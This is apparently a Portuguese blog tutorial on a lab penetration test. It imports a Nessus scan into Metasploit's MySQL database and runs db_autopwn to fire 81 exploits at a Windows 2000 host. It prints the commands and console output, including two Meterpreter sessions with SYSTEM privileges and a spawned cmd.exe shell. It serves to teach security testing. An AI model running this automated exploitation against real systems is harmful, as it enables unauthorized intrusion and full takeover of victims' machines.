No post anterior apresentei como a integração entre o Nessus e o MSF pode tornar nossa vida bastante interessante.
Agora irei rebuscar os testes usando o MySQL para manter os alvos e suas vulnerabilidades em uma base de dados, explorando-as de forma automatizada com o db_autopwn.
O ambiente dos testes continuará o mesmo:
Host Debian com o Nessus, Metasploit e o MySQL
Host Windows 2000
Pré-requisito para os testes:
Possuir os seguintes itens instalados:
* libdbd-mysql-ruby1.8
* Módulo activerecord ( gem install activerecord )
Preparando o ambiente
Inicei o driver para MySQL no MSF
msf> db_driver mysql
Conectei o banco e criei uma base de dados chamada msf
msf> db_connect msf:******@localhost/msf
Importei o report do Nessus para o banco
msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
Listando as portas apartir da base de dados msf
msf> db_services
Services
========created_at info name port proto state updated_at Host Workspace
———- —- —- —- —– —– ———- —- ———
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
ri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Listando as vulnerabilidades apartir da base de dados msf
msf > db_vulns
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=
….
O db-autopwn
O db_autopwn escaneará a base de dados e criará uma lista de módulos específicos para cada vulnerabilidade existente no alvo. A criação destes módulos ocorrerá de 2 formas:
1 – Os exploits serão carregados através da análise da lista de vulnerabilidades. Este tipo de cross-referência depende de alguns padrões como OSVDB, Bugtraq, e CVE para vincular o exploit ao alvo.
2 – Usa portas padrões associadas a cada exploit para localizar os alvos que estão rodando o mesmo serviço.
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
Hora da ação 😛
msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
….
================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800…
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445…
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21…
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21…
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21…
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445…
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445…
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445…
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139…
….
[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution…
….
[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================Active sessions
===============Id Type Information Connection Via
— —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITYSYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom
[*] ================================================================================
Iniciando a sessão
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > execute -i -H -f cmd.exe
Process 736 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.C:WINNTsystem32>
Observações importantes:
0 – Isso não é magia é tecnologia1 – Estes testes são de caráter totalmente experimental;
2 – O uso destas ferramentas e ações requerem alguns conhecimentos prévios como:
* Entender sistemas operacionais;
* Entender profundamente o protocolo TCP/IP;
* Entender o funcionamento dos exploits, payloads, shellcodes e etc;
* Entender a dinâmica das causas e os impactos das vulnerabilidades;
* Usar estes conhecimentos de forma ética;
Muiito interessante rs